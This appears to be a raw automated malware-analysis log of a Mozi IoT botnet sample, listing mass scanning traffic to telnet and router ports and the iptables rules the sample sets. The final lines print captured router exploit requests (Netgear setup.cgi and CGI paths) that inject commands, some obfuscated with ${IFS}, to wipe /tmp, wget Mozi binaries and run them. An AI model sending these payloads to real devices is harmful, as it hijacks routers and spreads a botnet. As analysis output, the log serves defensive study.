                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 96.235.67.124:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 223.10.72.22:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 54.134.139.3:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 184.229.170.8:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 221.227.182.211:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 40.228.190.166:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 96.156.161.212:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 85.142.188.42:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 95.255.225.178:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 121.54.99.88:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 213.188.143.7:1023
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 108.6.53.39:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 152.225.146.91:1023
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 138.233.126.196:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 87.103.12.42:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 110.187.234.174:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 220.216.248.17:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 34.171.35.5:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 169.214.107.191:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 96.210.178.155:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 193.41.224.172:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 78.240.206.71:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 36.67.202.143:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 177.238.154.83:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 210.223.138.31:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 163.30.109.135:1023
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 121.141.227.129:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 57.76.219.101:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 165.196.17.129:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 20.112.52.98:1023
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 45.102.119.100:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 206.179.202.198:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 108.254.9.93:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 178.137.148.135:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 209.167.118.84:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 96.251.199.11:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 151.253.46.65:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 2.32.158.141:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 135.109.221.219:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 36.21.130.32:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 152.78.33.31:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 177.8.55.136:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 20.236.172.198:1023
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 221.9.244.236:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 18.212.18.180:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 99.160.74.164:2323
                            Source: global trafficTCP traffic: 192.168.2.23:56406 -> 137.158.14.87:8443
                            Source: global trafficTCP traffic: 192.168.2.23:57186 -> 140.128.108.40:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50112 -> 28.52.126.104:8443
                            Source: global trafficTCP traffic: 192.168.2.23:37318 -> 132.199.20.209:7574
                            Source: global trafficTCP traffic: 192.168.2.23:36252 -> 215.153.214.163:5555
                            Source: global trafficTCP traffic: 192.168.2.23:36602 -> 88.199.24.156:81
                            Source: global trafficTCP traffic: 192.168.2.23:35802 -> 159.182.246.146:8080
                            Source: global trafficTCP traffic: 192.168.2.23:41056 -> 171.52.114.81:81
                            Source: global trafficTCP traffic: 192.168.2.23:53394 -> 160.14.3.218:5555
                            Source: global trafficTCP traffic: 192.168.2.23:57340 -> 163.191.18.235:5555
                            Source: global trafficTCP traffic: 192.168.2.23:52308 -> 220.130.230.90:37215
                            Source: global trafficTCP traffic: 192.168.2.23:48580 -> 45.52.252.78:52869
                            Source: global trafficTCP traffic: 192.168.2.23:56476 -> 203.102.228.87:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55624 -> 81.101.181.75:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57690 -> 50.184.254.142:49152
                            Source: global trafficTCP traffic: 192.168.2.23:43540 -> 157.184.128.35:49152
                            Source: global trafficTCP traffic: 192.168.2.23:41842 -> 184.80.231.138:5555
                            Source: global trafficTCP traffic: 192.168.2.23:47926 -> 45.104.230.8:5555
                            Source: global trafficTCP traffic: 192.168.2.23:42954 -> 221.56.144.117:52869
                            Source: global trafficTCP traffic: 192.168.2.23:57150 -> 149.149.230.210:7574
                            Source: global trafficTCP traffic: 192.168.2.23:37892 -> 53.15.12.160:81
                            Source: global trafficTCP traffic: 192.168.2.23:46534 -> 96.99.41.130:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51244 -> 111.77.188.193:7574
                            Source: global trafficTCP traffic: 192.168.2.23:49652 -> 17.222.184.219:37215
                            Source: global trafficTCP traffic: 192.168.2.23:56356 -> 45.108.234.239:49152
                            Source: global trafficTCP traffic: 192.168.2.23:46862 -> 39.139.249.97:7574
                            Source: global trafficTCP traffic: 192.168.2.23:48634 -> 207.83.90.76:8443
                            Source: global trafficTCP traffic: 192.168.2.23:40496 -> 116.71.38.216:5555
                            Source: global trafficTCP traffic: 192.168.2.23:47696 -> 216.25.147.56:37215
                            Source: global trafficTCP traffic: 192.168.2.23:57208 -> 103.231.22.13:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60760 -> 48.117.0.63:52869
                            Source: global trafficTCP traffic: 192.168.2.23:35952 -> 51.101.240.38:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54142 -> 1.82.77.148:8443
                            Source: global trafficTCP traffic: 192.168.2.23:55938 -> 104.23.10.48:81
                            Source: global trafficTCP traffic: 192.168.2.23:34524 -> 89.69.164.227:7574
                            Source: global trafficTCP traffic: 192.168.2.23:46350 -> 149.81.97.242:5555
                            Source: global trafficTCP traffic: 192.168.2.23:60808 -> 130.229.101.197:7574
                            Source: global trafficTCP traffic: 192.168.2.23:53368 -> 94.23.166.65:7574
                            Source: global trafficTCP traffic: 192.168.2.23:46238 -> 43.33.231.8:37215
                            Source: global trafficTCP traffic: 192.168.2.23:57584 -> 150.117.172.218:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57654 -> 30.199.225.176:5555
                            Source: global trafficTCP traffic: 192.168.2.23:50436 -> 131.116.99.90:5555
                            Source: global trafficTCP traffic: 192.168.2.23:38524 -> 120.166.25.14:8080
                            Source: global trafficTCP traffic: 192.168.2.23:38734 -> 96.170.47.107:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57660 -> 16.226.189.211:37215
                            Source: global trafficTCP traffic: 192.168.2.23:33744 -> 158.86.239.37:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33322 -> 125.187.103.250:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54100 -> 88.84.113.17:81
                            Source: global trafficTCP traffic: 192.168.2.23:58408 -> 21.134.232.205:5555
                            Source: global trafficTCP traffic: 192.168.2.23:39352 -> 25.183.80.146:8443
                            Source: global trafficTCP traffic: 192.168.2.23:35170 -> 16.77.80.254:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57032 -> 8.84.61.38:49152
                            Source: global trafficTCP traffic: 192.168.2.23:59014 -> 132.49.92.222:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42286 -> 18.15.162.21:5555
                            Source: global trafficTCP traffic: 192.168.2.23:58148 -> 200.230.30.18:8080
                            Source: global trafficTCP traffic: 192.168.2.23:59878 -> 133.125.92.48:49152
                            Source: global trafficTCP traffic: 192.168.2.23:59072 -> 189.98.38.229:49152
                            Source: global trafficTCP traffic: 192.168.2.23:36370 -> 136.136.129.33:7574
                            Source: global trafficTCP traffic: 192.168.2.23:51890 -> 60.1.162.124:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42684 -> 7.10.125.112:8080
                            Source: global trafficTCP traffic: 192.168.2.23:50988 -> 217.144.221.208:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57452 -> 35.167.30.58:52869
                            Source: global trafficTCP traffic: 192.168.2.23:54752 -> 6.202.218.89:49152
                            Source: global trafficTCP traffic: 192.168.2.23:40410 -> 119.22.161.221:52869
                            Source: global trafficTCP traffic: 192.168.2.23:42296 -> 204.63.42.89:5555
                            Source: global trafficTCP traffic: 192.168.2.23:46252 -> 199.5.195.180:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45458 -> 67.83.201.193:37215
                            Source: global trafficTCP traffic: 192.168.2.23:33168 -> 109.102.97.141:37215
                            Source: global trafficTCP traffic: 192.168.2.23:58124 -> 115.154.10.118:5555
                            Source: global trafficTCP traffic: 192.168.2.23:57308 -> 113.173.184.52:49152
                            Source: global trafficTCP traffic: 192.168.2.23:48772 -> 117.185.49.141:37215
                            Source: global trafficTCP traffic: 192.168.2.23:52072 -> 155.200.251.97:8443
                            Source: global trafficTCP traffic: 192.168.2.23:53342 -> 16.105.15.59:81
                            Source: global trafficTCP traffic: 192.168.2.23:51418 -> 177.37.167.95:52869
                            Source: global trafficTCP traffic: 192.168.2.23:36572 -> 113.11.42.76:52869
                            Source: global trafficTCP traffic: 192.168.2.23:54682 -> 145.121.192.57:8443
                            Source: global trafficTCP traffic: 192.168.2.23:50802 -> 205.52.53.240:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47518 -> 93.197.81.37:8443
                            Source: global trafficTCP traffic: 192.168.2.23:44058 -> 162.56.247.74:7574
                            Source: global trafficTCP traffic: 192.168.2.23:44086 -> 115.60.230.213:5555
                            Source: global trafficTCP traffic: 192.168.2.23:58964 -> 112.70.171.83:8443
                            Source: global trafficTCP traffic: 192.168.2.23:32956 -> 120.96.177.206:37215
                            Source: global trafficTCP traffic: 192.168.2.23:45448 -> 106.46.13.150:8080
                            Source: global trafficTCP traffic: 192.168.2.23:32846 -> 49.192.131.240:37215
                            Source: global trafficTCP traffic: 192.168.2.23:58148 -> 214.171.62.194:7574
                            Source: global trafficTCP traffic: 192.168.2.23:39906 -> 115.155.24.23:5555
                            Source: global trafficTCP traffic: 192.168.2.23:57234 -> 100.26.89.18:8080
                            Source: global trafficTCP traffic: 192.168.2.23:52340 -> 170.10.186.243:52869
                            Source: global trafficTCP traffic: 192.168.2.23:43206 -> 2.152.124.161:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34242 -> 7.62.201.148:81
                            Source: global trafficTCP traffic: 192.168.2.23:44326 -> 180.188.222.161:52869
                            Source: global trafficTCP traffic: 192.168.2.23:35838 -> 54.118.74.41:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51622 -> 92.247.69.60:8443
                            Source: global trafficTCP traffic: 192.168.2.23:40388 -> 154.211.50.52:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58788 -> 210.207.191.104:37215
                            Source: global trafficTCP traffic: 192.168.2.23:48832 -> 16.177.230.17:8080
                            Source: global trafficTCP traffic: 192.168.2.23:49260 -> 218.77.247.153:81
                            Source: global trafficTCP traffic: 192.168.2.23:36084 -> 43.139.176.218:8080
                            Source: global trafficTCP traffic: 192.168.2.23:56786 -> 73.58.211.50:37215
                            Source: global trafficTCP traffic: 192.168.2.23:50770 -> 4.46.56.44:49152
                            Source: global trafficTCP traffic: 192.168.2.23:59614 -> 199.92.69.73:7574
                            Source: global trafficTCP traffic: 192.168.2.23:44048 -> 88.54.117.228:37215
                            Source: global trafficTCP traffic: 192.168.2.23:59578 -> 115.106.3.245:37215
                            Source: global trafficTCP traffic: 192.168.2.23:41670 -> 163.145.48.236:8443
                            Source: global trafficTCP traffic: 192.168.2.23:53194 -> 23.202.41.211:49152
                            Source: global trafficTCP traffic: 192.168.2.23:57944 -> 105.54.52.184:8443
                            Source: global trafficTCP traffic: 192.168.2.23:46288 -> 13.109.184.86:8443
                            Source: global trafficTCP traffic: 192.168.2.23:38750 -> 118.151.114.80:5555
                            Source: global trafficTCP traffic: 192.168.2.23:32884 -> 116.175.89.26:49152
                            Source: global trafficTCP traffic: 192.168.2.23:36150 -> 91.144.116.224:81
                            Source: global trafficTCP traffic: 192.168.2.23:55898 -> 85.52.221.218:52869
                            Source: global trafficTCP traffic: 192.168.2.23:54248 -> 184.201.146.94:81
                            Source: global trafficTCP traffic: 192.168.2.23:55846 -> 116.48.214.197:49152
                            Source: global trafficTCP traffic: 192.168.2.23:46142 -> 50.129.165.8:8080
                            Source: global trafficTCP traffic: 192.168.2.23:35422 -> 185.249.96.80:52869
                            Source: global trafficTCP traffic: 192.168.2.23:48992 -> 81.55.21.230:81
                            Source: global trafficTCP traffic: 192.168.2.23:38104 -> 50.210.105.42:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45652 -> 188.195.245.36:37215
                            Source: global trafficTCP traffic: 192.168.2.23:54110 -> 123.192.215.13:81
                            Source: global trafficTCP traffic: 192.168.2.23:34360 -> 83.248.54.126:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43718 -> 215.101.251.205:5555
                            Source: global trafficTCP traffic: 192.168.2.23:37440 -> 94.177.142.161:52869
                            Source: global trafficTCP traffic: 192.168.2.23:48118 -> 33.72.49.85:8080
                            Source: global trafficTCP traffic: 192.168.2.23:37144 -> 157.232.42.141:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51658 -> 48.181.195.14:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60274 -> 101.203.94.126:52869
                            Source: global trafficTCP traffic: 192.168.2.23:33500 -> 140.24.155.93:8080
                            Source: global trafficTCP traffic: 192.168.2.23:59196 -> 190.162.9.88:8080
                            Source: global trafficTCP traffic: 192.168.2.23:50956 -> 124.175.99.173:81
                            Source: global trafficTCP traffic: 192.168.2.23:48514 -> 109.3.50.60:8080
                            Source: global trafficTCP traffic: 192.168.2.23:59994 -> 220.129.74.204:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36482 -> 64.132.168.64:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43520 -> 69.249.109.177:5555
                            Source: global trafficTCP traffic: 192.168.2.23:45952 -> 107.108.113.107:7574
                            Source: global trafficTCP traffic: 192.168.2.23:41918 -> 59.14.26.31:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39824 -> 169.191.103.1:8443
                            Source: global trafficTCP traffic: 192.168.2.23:49658 -> 2.144.236.217:5555
                            Source: global trafficTCP traffic: 192.168.2.23:34456 -> 18.5.160.184:7574
                            Source: global trafficTCP traffic: 192.168.2.23:42762 -> 209.9.90.236:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39076 -> 216.224.95.80:7574
                            Source: global trafficTCP traffic: 192.168.2.23:42032 -> 8.14.41.206:8080
                            Source: global trafficTCP traffic: 192.168.2.23:41460 -> 40.156.170.132:52869
                            Source: global trafficTCP traffic: 192.168.2.23:42800 -> 196.223.36.172:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55486 -> 180.120.70.59:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53162 -> 140.22.65.76:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42486 -> 37.230.73.95:8443
                            Source: global trafficTCP traffic: 192.168.2.23:42434 -> 94.215.141.54:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55920 -> 128.91.58.4:52869
                            Source: global trafficTCP traffic: 192.168.2.23:59080 -> 87.173.40.163:81
                            Source: global trafficTCP traffic: 192.168.2.23:59872 -> 26.69.100.31:7574
                            Source: global trafficTCP traffic: 192.168.2.23:45786 -> 60.220.129.51:5555
                            Source: global trafficTCP traffic: 192.168.2.23:44778 -> 154.235.218.105:37215
                            Source: global trafficTCP traffic: 192.168.2.23:37556 -> 20.164.209.99:49152
                            Source: global trafficTCP traffic: 192.168.2.23:35102 -> 16.102.200.139:5555
                            Source: global trafficTCP traffic: 192.168.2.23:46686 -> 16.50.226.176:8443
                            Source: global trafficTCP traffic: 192.168.2.23:53158 -> 197.112.191.213:8080
                            Source: global trafficTCP traffic: 192.168.2.23:35140 -> 209.141.18.141:8443
                            Source: global trafficTCP traffic: 192.168.2.23:41552 -> 105.12.76.241:8443
                            Source: global trafficTCP traffic: 192.168.2.23:60798 -> 112.153.207.115:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47784 -> 168.216.138.12:49152
                            Source: global trafficTCP traffic: 192.168.2.23:40512 -> 18.179.120.132:5555
                            Source: global trafficTCP traffic: 192.168.2.23:59598 -> 102.187.77.194:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60602 -> 121.177.118.150:49152
                            Source: global trafficTCP traffic: 192.168.2.23:56896 -> 166.196.205.22:49152
                            Source: global trafficTCP traffic: 192.168.2.23:60862 -> 25.128.176.48:49152
                            Source: global trafficTCP traffic: 192.168.2.23:47860 -> 86.240.223.174:5555
                            Source: global trafficTCP traffic: 192.168.2.23:54338 -> 157.77.71.177:52869
                            Source: global trafficTCP traffic: 192.168.2.23:44166 -> 59.9.127.185:7574
                            Source: global trafficTCP traffic: 192.168.2.23:51864 -> 27.76.195.81:52869
                            Source: global trafficTCP traffic: 192.168.2.23:40208 -> 158.99.48.169:7574
                            Source: global trafficTCP traffic: 192.168.2.23:51046 -> 129.30.155.167:7574
                            Source: global trafficTCP traffic: 192.168.2.23:41268 -> 179.41.218.103:81
                            Source: global trafficTCP traffic: 192.168.2.23:33486 -> 62.93.241.10:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55726 -> 9.174.94.208:7574
                            Source: global trafficTCP traffic: 192.168.2.23:59172 -> 65.158.119.67:81
                            Source: global trafficTCP traffic: 192.168.2.23:36540 -> 39.43.84.54:81
                            Source: global trafficTCP traffic: 192.168.2.23:34340 -> 27.39.220.124:49152
                            Source: global trafficTCP traffic: 192.168.2.23:46410 -> 130.152.81.149:8080
                            Source: global trafficTCP traffic: 192.168.2.23:37352 -> 157.133.189.147:8443
                            Source: global trafficTCP traffic: 192.168.2.23:55346 -> 221.232.130.20:5555
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 200.46.215.144:1023
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 27.104.167.190:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 165.101.122.72:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 90.184.128.52:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 27.158.104.22:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 188.197.221.93:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 158.117.17.131:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 2.148.182.163:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 125.26.139.21:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 213.19.46.120:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 223.157.57.81:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 198.73.141.236:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 195.133.8.123:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 40.189.195.112:1023
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 2.141.22.127:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 186.233.121.16:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 100.166.44.48:2323
                            Source: global trafficTCP traffic: 192.168.2.23:46674 -> 46.158.65.38:5555
                            Source: global trafficTCP traffic: 192.168.2.23:47122 -> 106.191.238.168:49152
                            Source: global trafficTCP traffic: 192.168.2.23:44486 -> 161.247.139.55:49152
                            Source: global trafficTCP traffic: 192.168.2.23:47024 -> 162.168.216.21:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54940 -> 181.205.181.133:52869
                            Source: global trafficTCP traffic: 192.168.2.23:58840 -> 137.0.42.238:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50776 -> 139.19.245.50:37215
                            Source: global trafficTCP traffic: 192.168.2.23:38990 -> 183.252.240.123:37215
                            Source: global trafficTCP traffic: 192.168.2.23:51896 -> 167.99.9.19:52869
                            Source: global trafficTCP traffic: 192.168.2.23:52126 -> 27.254.98.7:81
                            Source: global trafficTCP traffic: 192.168.2.23:56716 -> 102.26.234.249:8443
                            Source: global trafficTCP traffic: 192.168.2.23:39240 -> 218.165.242.77:37215
                            Source: global trafficTCP traffic: 192.168.2.23:37346 -> 9.144.121.102:8080
                            Source: global trafficTCP traffic: 192.168.2.23:37686 -> 25.107.103.6:8080
                            Source: global trafficTCP traffic: 192.168.2.23:37752 -> 165.243.77.56:81
                            Source: global trafficTCP traffic: 192.168.2.23:42546 -> 53.194.83.148:49152
                            Source: global trafficTCP traffic: 192.168.2.23:38998 -> 12.159.37.238:8443
                            Source: global trafficTCP traffic: 192.168.2.23:54150 -> 3.123.123.11:52869
                            Source: global trafficTCP traffic: 192.168.2.23:54556 -> 103.73.217.56:5555
                            Source: global trafficTCP traffic: 192.168.2.23:51266 -> 186.168.207.252:5555
                            Source: global trafficTCP traffic: 192.168.2.23:54558 -> 105.44.151.46:8080
                            Source: global trafficTCP traffic: 192.168.2.23:59810 -> 46.30.194.244:49152
                            Source: global trafficTCP traffic: 192.168.2.23:37578 -> 37.82.178.37:81
                            Source: global trafficTCP traffic: 192.168.2.23:49620 -> 133.45.42.63:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36264 -> 92.188.86.111:52869
                            Source: global trafficTCP traffic: 192.168.2.23:52436 -> 5.178.52.148:5555
                            Source: global trafficTCP traffic: 192.168.2.23:39386 -> 26.97.222.188:81
                            Source: global trafficTCP traffic: 192.168.2.23:49982 -> 104.107.170.197:49152
                            Source: global trafficTCP traffic: 192.168.2.23:56564 -> 158.202.203.74:52869
                            Source: global trafficTCP traffic: 192.168.2.23:47058 -> 218.56.56.133:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58626 -> 182.3.2.210:81
                            Source: global trafficTCP traffic: 192.168.2.23:40176 -> 25.5.193.190:49152
                            Source: global trafficTCP traffic: 192.168.2.23:55512 -> 61.94.178.230:5555
                            Source: global trafficTCP traffic: 192.168.2.23:54594 -> 183.52.28.254:8080
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 87.185.24.95:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 86.183.229.252:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 37.74.164.183:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 24.119.240.69:2323
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 209.250.245.185:1023
                            Source: global trafficTCP traffic: 192.168.2.23:41973 -> 95.157.76.95:2323
                            Source: /bin/sh (PID: 6273)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6280)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6283)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6287)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6290)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6302)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6308)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6315)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6318)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6324)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6350)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6374)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6380)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6386)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6392)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6398)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6404)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6410)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6416)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6422)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6428)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6434)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6443)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6448)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6454)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6457)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6460)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6463)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6469)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6475)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 1027 -j ACCEPTJump to behavior
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
